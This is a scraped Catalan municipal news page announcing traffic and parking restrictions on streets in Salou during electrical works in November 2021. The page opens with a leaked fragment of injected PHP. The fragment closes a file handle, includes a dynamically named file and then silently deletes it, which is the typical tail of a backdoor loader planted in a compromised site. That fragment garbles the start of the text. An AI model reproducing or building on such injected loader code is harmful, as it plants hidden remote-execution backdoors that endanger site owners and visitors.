");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Afectacions al trànsit als carrers València i Barcelona de Salou
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Afectacions al trànsit als carrers València i Barcelona de Salou (02/11/2021)

L’Ajuntament de Salou informa la ciutadania sobre properes afectacions al trànsit, a causa de les obres de millora de les instaŀlacions elèctriques, en dos trams dels carrers València i Barcelona.

El primer tram afectat serà al carrer València, entre el c. Gandesa i el c. Barenys. En aquesta zona no es podrà estacionar. A més, hi haurà talls a la circulació. Tanmateix, sí que es garantirà l’entrada i sortida de pàrquings privats de les comunitats de veïns.

D’altra banda, el segon tram serà al carrer Barcelona, entre Via Augusta i c. Escaladei. En aquest espai no es podrà estacionar, i els dos carrils de circulació quedaran reduïts a un sol, de manera que sí es podrà circular. Així mateix, les zones de càrrega i descàrrega, i les parades d’autobús restaran operatives; i es garantirà l’entrada i sortida de pàrquings privats.

També hi haurà afectacions al trànsit al tram de Via Augusta, entre el carrer Barcelona i c. Ciutat de Reus.

Els treballs de millora començaran el proper dimarts, dia 2 de novembre, i es preveu que finalitzin el 25 de novembre. Les obres aniran a càrrec d'una empresa.

Font: Ajuntament de Salou

Afectacions al trànsit als carrers València i Barcelona de Salou

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona